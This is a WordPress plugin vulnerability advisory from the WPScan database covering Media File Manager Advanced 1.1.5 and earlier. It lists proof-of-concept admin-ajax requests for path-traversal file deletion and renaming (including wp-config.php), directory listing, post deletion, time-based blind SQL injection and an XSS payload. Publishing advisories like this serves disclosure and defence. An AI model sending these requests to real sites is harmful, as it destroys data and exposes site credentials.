Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilites

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Media File Manager Advanced suffers from executing administrator actions by any authenticated user due to weak permissions checking.

An attacker is able to delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting.
Proof of Concept
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) 

Sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php

Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt 

Directory Listing 
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Affects

Plugin media-file-manager-advanced

References

PACKETSTORM 131949
URL http://web.archive.org/web/20150912142109/http://research.evex.pw/?vuln=16

Classification

Type MULTI

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 350
Verified No
WPVDB ID 7983

Timeline

Publicly Published 2015-05-13 (over 1 year ago)
Added 2015-05-13 (over 1 year ago)
Last Updated 2016-04-24 (8 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.